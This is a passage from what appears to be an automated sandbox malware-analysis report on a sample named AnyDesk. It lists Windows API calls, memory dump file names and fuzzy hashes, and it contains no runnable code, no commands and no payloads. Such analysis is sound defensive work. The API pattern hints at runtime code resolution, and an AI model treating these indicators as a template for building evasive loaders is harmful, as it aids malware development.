              • Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9
            • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B383C2), ref: 02B383A4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: HandleModule$AddressProc$CacheFlushInstruction
            • String ID: FlushInstructionCache$Kernel32
            • API String ID: 3811539418-184458249
            • Opcode ID: 16b1d31535d349acafd9d0fe86f50c04f647600a25ba44bbd75007b5be1588f2
            • Instruction ID: 9c078086d01f9367bf79dd161cdc4ade62432ef2569096279653f8e3e5835b42
            • Opcode Fuzzy Hash: 16b1d31535d349acafd9d0fe86f50c04f647600a25ba44bbd75007b5be1588f2
            • Instruction Fuzzy Hash: 74016D71648304AFE701EFA4DC42F5E77FDEB08B00F6184A0B904D7650DA70AE149E26
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AllocValue
            • String ID: hZ
            • API String ID: 1189806713-2274723117
            • Opcode ID: b69d212d16f9acf151019258de6dc36883c14c0d1764d61d6bd48e88b86b7003
            • Instruction ID: 61e2a274832902d0821c63fe690a804e616cb7cced9d9a864a4320b0e87b1041
            • Opcode Fuzzy Hash: b69d212d16f9acf151019258de6dc36883c14c0d1764d61d6bd48e88b86b7003
            • Instruction Fuzzy Hash: 1CC012B0D4035046DF00BB709040A053BDDFB10744B4849D16568C710CDB34E01CCF11
            APIs
            • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AF58
            • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B3AF88
            • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B3AFA7
            • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AFB3
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Read$Write
            • String ID:
            • API String ID: 3448952669-0
            • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
            • Instruction ID: 563421ab3bfb8f41d11e6f9c9921acddb87e813d0ba447d38dd576d16096ee39
            • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
            • Instruction Fuzzy Hash: 6B21B4B26407199BDB12DF69CCC0BAE73A9EF44311F104691FD54D7380E734E8118BA0